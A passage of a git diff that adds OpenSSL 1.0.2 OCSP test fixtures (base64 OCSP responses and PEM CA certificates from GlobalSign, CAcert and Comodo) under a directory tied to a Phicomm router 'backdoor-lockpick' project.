diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D1.ors
new file mode 100644
index 0000000..d7566cf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D1.ors
@@ -0,0 +1,32 @@
+MIIFzwoBAKCCBcgwggXEBgkrBgEFBQcwAQEEggW1MIIFsTCBoKIWBBSpTXftIZX0
+lLT9zwVSQC5Jfp3pqhgPMjAxMjEwMTAxNDU0NDNaMHUwczBLMAkGBSsOAwIaBQAE
+FKByDqBqfGICVPKo9Z3Se6Tzty+kBBSwsEr9HHUo+BxhqhP2+sGQPWsWowISESG8
+vx4IzALnkqQG05AvM+2bgAAYDzIwMTIxMDEwMTMwMDAwWqARGA8yMDEyMTAxNzEz
+MDAwMFowCwYJKoZIhvcNAQEFA4IBAQBw5Z+0ggEddRTIq7cXlMoxG9Nrx4HtutsH
+itIUoZp/rlLoxHsJTo/VmdZvTTGIc7Ok9XuoH61lY/x9glAKsGRjz4Myc9+5rx0O
+675lwmOS+uaf3/hRkicVrVr7Pt2ug3R7OXm2MJrohjNKP8lqtLJ0hHP88a8rotKA
+r9uz/qHm7K4Uh7dRt/Pnu9MPG74tZeFNN4M1ONMEiRdG39FqzFDXWxwQ3NmyC0Wo
+DQn+NklZMknr8mm7IBWpzgU1fTD9R0yv0zdhUZGiEXxvdhm7GJrTET5jS30Ksm5j
+o+n39YVu/vGbjyyYx3+WdeQLEyipaGvldSuJpT+R684/RuFWNetcoIID+DCCA/Qw
+ggPwMIIC2KADAgECAhIRIcYjwu4UNkR1VGrDbSdFei8wDQYJKoZIhvcNAQEFBQAw
+WTELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExLzAtBgNV
+BAMTJkdsb2JhbFNpZ24gRXh0ZW5kZWQgVmFsaWRhdGlvbiBDQSAtIEcyMB4XDTEy
+MDkxOTA3NDAzMVoXDTEyMTIxOTA4NDAzMVowgYUxCzAJBgNVBAYTAkJFMRkwFwYD
+VQQKExBHbG9iYWxTaWduIG52LXNhMUIwQAYDVQQDEzlHbG9iYWxTaWduIEV4dGVu
+ZGVkIFZhbGlkYXRpb24gQ0EgLSBHMiBPQ1NQIHJlc3BvbmRlciAtIDExFzAVBgNV
+BAUTDjIwMTIwOTE5MDkzOTAwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEAx0kb6QhDH3sEDj4zaysjVzYelq9lZ1cso4R2IyQxaoPaG6GkaCmHA4sz6KP+
+m3ADqplibEUBa/mzCxHW8/oy3NhGMFdbezduZrnRFLbzakOTeIo8VEIM3JPfgREv
+CX8nj6Xu7ERD6JO/ZQ9Xr7YVzKKN+3cVZlcMHoGBnOPcO2Sz0AcYyk5m5IsGBRoT
+T86j6Cr9PhOPTVwXL6Wxy1KVHsUZXUwnRacV0O4SHWQ4zM9Sablus9fTbh1CgIqW
+sKDyzVB4yECXkBVeUlA+cuCaRRVHRiR+jPDSgbU62nnNudEpGG7dyoop6IOvXv2O
+ydncWzaukxIVvQ/Ij85kHqs7HQIDAQABo4GEMIGBMAkGA1UdEwQCMAAwDgYDVR0P
+AQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMA8GCSsGAQUFBzABBQQCBQAw
+HQYDVR0OBBYEFKlNd+0hlfSUtP3PBVJALkl+nemqMB8GA1UdIwQYMBaAFLCwSv0c
+dSj4HGGqE/b6wZA9axajMA0GCSqGSIb3DQEBBQUAA4IBAQCe4rZg61Dmwygl/Uae
+BJZog64/FvuB1sfCqKLJTjKOfLcugSTX1TT7bLJbzXRGPQuorI3TIZEOwldIw01d
+DTLlsOCHrfHd+bpxgijxPkUuaA4NYnpvqTEMJqPKOC8QYfKupNjAPSuHvwqvqCfO
+RCe3jY6xQDO0WCTZ8/xMsOkw+J/YEYqALETf2Ug7k5eRL/TvfLd8Sgi7vPfmUeiW
+ptlsbhMOWQoQc+JA3vCI01rrjNq+0kIZ/r8nPGvablRr0Aakk6eDuS2dcReaPwuK
+0xE136pJYiXdQ3SA7uwmlorjxmejavyoPCr23TU74DQEt6hhc6uIcabsa4Y8KvJy
+RI4G
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D2.ors
new file mode 100644
index 0000000..757db75
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D2.ors
@@ -0,0 +1,32 @@
+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
+fBIRKjnK621vAWvc7UR+0hqnZ+U=
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D3.ors
new file mode 100644
index 0000000..c33179c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKDOSC_D3.ors
@@ -0,0 +1,38 @@
+MIIG8AoBAKCCBukwggblBgkrBgEFBQcwAQEEggbWMIIG0jCB+aF+MHwxCzAJBgNV
+BAYTAkFVMQwwCgYDVQQIEwNOU1cxDzANBgNVBAcTBlN5ZG5leTEUMBIGA1UEChML
+Q0FjZXJ0IEluYy4xHjAcBgNVBAsTFVNlcnZlciBBZG1pbmlzdHJhdGlvbjEYMBYG
+A1UEAxMPb2NzcC5jYWNlcnQub3JnGA8yMDEyMTAxMDE1MTkzOVowZjBkMDwwCQYF
+Kw4DAhoFAAQUi6TJyxcpGUU+u45zCZG5JfKDImUEFBa1MhvUx/Pg5o7zvdKwOu6y
+ORjRAgMLs8aAABgPMjAxMjEwMTAxNDU2MTdaoBEYDzIwMTIxMDEyMTUxOTM5WjAN
+BgkqhkiG9w0BAQUFAAOCAQEAH1Bs3glJoAvCHhgVtN4F/avlKA1St74v7yuD1DIu
+cBf/4YRJdxZATXMI8I0TPjSl8L+rRAiUTVd8sPhWQ9XD9WaYKkTEjuQSPp851/81
+zDihz9Kj5Rzo5PYpFsbSps/ALMQSRkrtuX4DCm9fbK7xC+adpbhQDnWW/GXM1+Ob
+lv3pHDQXLh2GQbRsaJBgLeSUxIIE7RWJv1N+Ugi5zF8rja5qnJ9DnkilEqMeXQp8
+SThaI+TOe+KHK+7wTp5QkFNIE5l/uKgvSNIOwLe9HDevlSl1wYF6e+mAz3uoQyJa
+Ucx8FIoV6CIr+wUd+P8CmNXiQ7M59I8gm3FCDiEvWDQGEaCCBL4wggS6MIIEtjCC
+Ap6gAwIBAgIDCpvzMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jvb3QgQ0Ex
+HjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZQ0EgQ2Vy
+dCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9ydEBjYWNl
+cnQub3JnMB4XDTExMDgyMzAwMDI1NloXDTEzMDgyMjAwMDI1NlowfDELMAkGA1UE
+BhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYDVQQKEwtD
+QWNlcnQgSW5jLjEeMBwGA1UECxMVU2VydmVyIEFkbWluaXN0cmF0aW9uMRgwFgYD
+VQQDEw9vY3NwLmNhY2VydC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCdxtRv5CPHw3BLdR/k/K72YsRgodbP+UdAONmvBvWzhwm6B8h6O+M64sFr
+2w6be7SYBECIyOQgNJ1flK4MoAWhdBA/H5NtxaDOKbAqA27tO9GaevcPp7c518O0
+3hVnlPLvsN1f48nY0jQOXUTfv5nYXmD0OSSK/V3IRo0KsWB6T9UnMGCeEwb4Oqqz
+uzM0b4SBflzMEony/m6Tg/qL7qs2TLZAqe77+BZaVdFkDUnaBN7RyMruXySxeXiz
+mogT3WhROeloMa/X+E01bWBYBEK7VZIY9pgBpXQ7vDbbIGgYuIXUi20wh03WMy16
+VDYdV0IUXHpidNUeK9W/BPP/7APBAgMBAAGjRDBCMAwGA1UdEwEB/wQCMAAwJwYD
+VR0lBCAwHgYIKwYBBQUHAwIGCCsGAQUFBwMBBggrBgEFBQcDCTAJBgNVHREEAjAA
+MA0GCSqGSIb3DQEBBQUAA4ICAQAoT6p5f3cGprAcgrnzdenfTmDe9LCW7k2VnazA
+MAzpsD6gXcSlo4+3hoHem/SpKRH2tqi34DmImCiv/S6fxsKM4Gfn5rlkAFviuTvS
+r5Zrwh4ZKSfaoWv4bmbzmcAxvuxdMWHf/5PbjegjzFTbBMekVPZY/abYtD6kdHQZ
+VNgzwZVfTBfYhfa+Rg72I2zjKpMsjxMqWfTmUzW6wfK6LFudZqu0U1NnJw+IlnVU
+6WtjL885ebQrmcRqWz3nMhVLIu5L3w/s+VTLvm7If6jcMDNUjz8s2BPcJeCXg3TE
+STsyl6tvk17RRz2+9JskxVOk11xIn96xR4FCERIid2ek9z1xi7oYOajQF50i/9Gj
+ReDEfRSyb4/LzoKDOY+h4Q6jryeHh7WIHFiK5qrBN2y8qOoRJ/OqQnqci/BJBNpe
+g9Q9PJRgGSzRndTXNHiYRbeLpq7eGo3sPqlR9qBQ3rd98XGOU0RCMnzjKhENC3qo
+5PkSF2xs8RmjWktFSTDwjYo0qf1teo7CGHjgaPjQ7JE8Q4ysFOQndSWmLpqwDcI9
+HfIvPwUIWArQrJRh9LCNSyvHVgLqY9kw8NW4TlMxV2WqaYCkiKi3XVRrSFR3ahS1
+VBvRZ8KpplrV7rhXjVSSqqfLk1sX3l72Ck2F9ON+qbNFmvhgNjSiBY9neMgo804a
+wG/pag==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D1_Issuer_ICA.pem
new file mode 100644
index 0000000..93fb70d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D1_Issuer_ICA.pem
@@ -0,0 +1,27 @@
+-----BEGIN CERTIFICATE-----
+MIIEhjCCA26gAwIBAgILBAAAAAABL07hXdQwDQYJKoZIhvcNAQEFBQAwTDEgMB4G
+A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjIxEzARBgNVBAoTCkdsb2JhbFNp
+Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTEwNDEzMTAwMDAwWhcNMjIwNDEz
+MTAwMDAwWjBZMQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1z
+YTEvMC0GA1UEAxMmR2xvYmFsU2lnbiBFeHRlbmRlZCBWYWxpZGF0aW9uIENBIC0g
+RzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDOoUbMUpq4pbR/WNnN
+2EugcgyXW6aIIMO5PUbc0FxSMPb6WU+FX7DbiLSpXysjSKyr9ZJ4FLYyD/tcaoVb
+AJDgu2X1WvlPZ37HbCnsk8ArysRe2LDb1r4/mwvAj6ldrvcAAqT8umYROHf+IyAl
+VRDFvYK5TLFoxuJwe4NcE2fBofN8C6iZmtDimyUxyCuNQPZSY7GgrVou9Xk2bTUs
+Dt0F5NDiB0i3KF4r1VjVbNAMoQFGAVqPxq9kx1UBXeHRxmxQJaAFrQCrDI1la93r
+wnJUyQ88ABeHIu/buYZ4FlGud9mmKE3zWI2DZ7k0JZscUYBR84OSaqOuR5rW5Isb
+wO2xAgMBAAGjggFaMIIBVjAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB
+/wIBADAdBgNVHQ4EFgQUsLBK/Rx1KPgcYaoT9vrBkD1rFqMwRwYDVR0gBEAwPjA8
+BgRVHSAAMDQwMgYIKwYBBQUHAgEWJmh0dHBzOi8vd3d3Lmdsb2JhbHNpZ24uY29t
+L3JlcG9zaXRvcnkvMDYGA1UdHwQvMC0wK6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFs
+c2lnbi5uZXQvcm9vdC1yMi5jcmwwRAYIKwYBBQUHAQEEODA2MDQGCCsGAQUFBzAB
+hihodHRwOi8vb2NzcC5nbG9iYWxzaWduLmNvbS9FeHRlbmRlZFNTTENBMCkGA1Ud
+JQQiMCAGCCsGAQUFBwMBBggrBgEFBQcDAgYKKwYBBAGCNwoDAzAfBgNVHSMEGDAW
+gBSb4gdXZxwewGoG3lm0mi3f3BmGLjANBgkqhkiG9w0BAQUFAAOCAQEAL0m28rZa
+pJWrnlrpK4KbzJBrfHRFIOde2Mcj7ig1sTVlKqVR4FU/9oNntOQ2KbDa7JeVqYoF
+o0X+Iy5SiLQfEICt0oufo1+oxetz3nmIQZgz7qdgGLFGyUAQB5yPClLJExoGbqCb
+LTr2rk/no1E1KlsYBRLlUdy2NmLz4aQP++TPw5S/EauhWTEB8MxT7I9j12yW00gq
+iiPtRVaoZkHqAblH7qFHDBTxI+Egc8p9UHxkOFejj0qcm+ltRc9Ea01gIEBxJbVG
+qmwIft/I+shWKpLLg7h5CZctXqEBzgbttJfJBNxB7+BPNk3kQHNG7BESfIhbNCYl
+TercGL7FG81kwA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D2_Issuer_Root.pem
new file mode 100644
index 0000000..61db7ae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D2_Issuer_Root.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
+MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
+aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDbDuaZ
+jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
+xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
+1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
+snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
+U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
+9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
+BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
+AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
+yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
+38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
+AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
+DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
+HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D3_Issuer_Root.pem
new file mode 100644
index 0000000..f03432b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_D3_Issuer_Root.pem
@@ -0,0 +1,41 @@
+-----BEGIN CERTIFICATE-----
+MIIHPTCCBSWgAwIBAgIBADANBgkqhkiG9w0BAQQFADB5MRAwDgYDVQQKEwdSb290
+IENBMR4wHAYDVQQLExVodHRwOi8vd3d3LmNhY2VydC5vcmcxIjAgBgNVBAMTGUNB
+IENlcnQgU2lnbmluZyBBdXRob3JpdHkxITAfBgkqhkiG9w0BCQEWEnN1cHBvcnRA
+Y2FjZXJ0Lm9yZzAeFw0wMzAzMzAxMjI5NDlaFw0zMzAzMjkxMjI5NDlaMHkxEDAO
+BgNVBAoTB1Jvb3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEi
+MCAGA1UEAxMZQ0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJ
+ARYSc3VwcG9ydEBjYWNlcnQub3JnMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
+CgKCAgEAzyLA4kZ97DYoB1CW8qAzQIxL8TtmPzHlawI229Z89vGIj053NgVBlfkJ
+8BLPRoZzYLdufujAWGSuzbCtRRcMY/pnCujW0r8+55jE8Ez64AO7NV1sId6eINm6
+zWYyN3L69wj1x81YyY7nDl7qPv4coRQKFWyGhFtkZip6qUtTefWIonvuLwphK42y
+fk1WpRPs6tqSnqxEQR5YYGUFZvjARL3LlPdCfgv3ZWiYUQXw8wWRBB0bF4LsyFe7
+w2t6iPGwcswlWyCR7BYCEo8y6RcYSNDHBS4CMEK4JZwFaz+qOqfrU0j36NK2B5jc
+G8Y0f3/JHIJ6BVgrCFvzOKKrF11myZjXnhCLotLddJr3cQxyYN/Nb5gznZY0dj4k
+epKwDpUeb+agRThHqtdB7Uq3EvbXG4OKDy7YCbZZ16oE/9KTfWgu3YtLq1i6L43q
+laegw1SJpfvbi1EinbLDvhG+LJGGi5Z4rSDTii8aP8bQUWWHIbEZAWV/RRyH9XzQ
+QUxPKZgh/TMfdQwEUfoZd9vUFBzugcMd9Zi3aQaRIt0AUMyBMawSB3s42mhb5ivU
+fslfrejrckzzAeVLIL+aplfKkQABi6F1ITe1Yw1nPkZPcCBnzsXWWdsC4PDSy826
+YreQQejdIOQpvGQpQsgi3Hia/0PsmBsJUUtaWsJx8cTLc6nloQsCAwEAAaOCAc4w
+ggHKMB0GA1UdDgQWBBQWtTIb1Mfz4OaO873SsDrusjkY0TCBowYDVR0jBIGbMIGY
+gBQWtTIb1Mfz4OaO873SsDrusjkY0aF9pHsweTEQMA4GA1UEChMHUm9vdCBDQTEe
+MBwGA1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0
+IFNpZ25pbmcgQXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2Vy
+dC5vcmeCAQAwDwYDVR0TAQH/BAUwAwEB/zAyBgNVHR8EKzApMCegJaAjhiFodHRw
+czovL3d3dy5jYWNlcnQub3JnL3Jldm9rZS5jcmwwMAYJYIZIAYb4QgEEBCMWIWh0
+dHBzOi8vd3d3LmNhY2VydC5vcmcvcmV2b2tlLmNybDA0BglghkgBhvhCAQgEJxYl
+aHR0cDovL3d3dy5jYWNlcnQub3JnL2luZGV4LnBocD9pZD0xMDBWBglghkgBhvhC
+AQ0ESRZHVG8gZ2V0IHlvdXIgb3duIGNlcnRpZmljYXRlIGZvciBGUkVFIGhlYWQg
+b3ZlciB0byBodHRwOi8vd3d3LmNhY2VydC5vcmcwDQYJKoZIhvcNAQEEBQADggIB
+ACjH7pyCArpcgBLKNQodgW+JapnM8mgPf6fhjViVPr3yBsOQWqy1YPaZQwGjiHCc
+nWKdpIevZ1gNMDY75q1I08t0AoZxPuIrA2jxNGJARjtT6ij0rPtmlVOKTV39O9lg
+18p5aTuxZZKmxoGCXJzN600BiqXfEVWqFcofN8CCmHBh22p8lqOOLlQ+TyGpkO/c
+gr/c6EWtTZBzCDyUZbAEmXZ/4rzCahWqlwQ3JNgelE5tDlG+1sSPypZt90Pf6DBl
+Jzt7u0NDY8RD97LsaMzhGY4i+5jhe1o+ATc7iwiwovOVThrLm82asduycPAtStvY
+sONvRUgzEv/+PDIqVPfE94rwiCPCR/5kenHA0R6mY7AHfqQv0wGP3J8rtsYIqQ+T
+SCX8Ev2fQtzzxD72V7DX3WnRBnc0CkvSyqD/HMaMyRa+xMwyN2hzXwj7UfdJUzYF
+CpUCTPJ5GhD22Dp1nPMd8aINcGeGG7MW9S/lpOt5hvk9C8JzC6WZrG/8Z7jlLwum
+GCSNe9FINSkYQKyTYOGWhlC0elnYjyELn8+CkcY7v2vcB5G5l1YjqrZslMZIBjzk
+zk6q5PYvCdxTby78dOs6Y5nCpqyJvKeyRKANihDjbPIky/qbn3BHLt4Ui9SyIAmW
+omTxJBzcoTWcFbLUvFUufQb1nA5V9FrWk9p2rSVzTMVD
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND1_Issuer_ICA.pem
new file mode 100644
index 0000000..f0d9811
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND1_Issuer_ICA.pem
@@ -0,0 +1,29 @@
+-----BEGIN CERTIFICATE-----
+MIIFBjCCA+6gAwIBAgIQEaO00OyNt3+doM1dLVEvQjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMDA1MjQwMDAw
+MDBaFw0yMDA1MzAxMDQ4MzhaMIGOMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDE0MDIGA1UEAxMrQ09NT0RPIEV4dGVuZGVkIFZhbGlkYXRp
+b24gU2VjdXJlIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
+ggEBAM1KljPNJY1n7iiWN4dG8PYEooR/U6qW5h+xAhxu7X0h1Nc8HqLYaS+ot/Wi
+7WRYZOFEZTZJQSABjTsT4gjzDPJXOZM3txyTRIOOvy3xoQV12m7ue28b6naDKHRK
+HCvT9cQDcpOvhs4JjDx11MkKL3Lzrb0OMDyEoXMfAyUUpY/D1vS15N2GevUZumjy
+hVSiMBHK0ZLLO3QGEqA3q2rYVBHfbJoWlLm0p2XGdC0x801S6VVRn8s+oo12mHDS
+b6ZlRS8bhbtbbfnywARmE4R6nc4n2PREnr+svpnba0/bWCGwiSe0jzLWS15ykV7f
+BZ3ZSS/0tm9QH3XLgJ3m0+TR8tMCAwEAAaOCAWkwggFlMB8GA1UdIwQYMBaAFAtY
+5YvGTBU3pECpMKkhvkc2Wlb/MB0GA1UdDgQWBBSIRFH/UCppXi2I9CG62Qzyzsvq
+fDAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB/wIBADA+BgNVHSAENzA1
+MDMGBFUdIAAwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2RvLmNv
+bS9DUFMwSQYDVR0fBEIwQDA+oDygOoY4aHR0cDovL2NybC5jb21vZG9jYS5jb20v
+Q09NT0RPQ2VydGlmaWNhdGlvbkF1dGhvcml0eS5jcmwwdAYIKwYBBQUHAQEEaDBm
+MD4GCCsGAQUFBzAChjJodHRwOi8vY3J0LmNvbW9kb2NhLmNvbS9DT01PRE9BZGRU
+cnVzdFNlcnZlckNBLmNydDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2Rv
+Y2EuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQCaQ7+vpHJezX1vf/T8PYy7cOYe3QT9
+P9ydn7+JdpvyhjH8f7PtKpFTLOKqsOPILHH3FYojHPFpLoH7sbxiC6saVBzZIl40
+TKX2Iw9dej3bQ81pfhc3Us1TocIR1FN4J2TViUFNFlW7kMvw2OTd3dMJZEgo/zIj
+hC+Me1UvzymINzR4DzOq/7fylqSbRIC1vmxWVKukgZ4lGChUOn8sY89ZIIwYazgs
+tN3t40DeDDYlV5rA0WCeXgNol64aO+pF11GZSe5EWVYLXrGPaOqKnsrSyaADfnAl
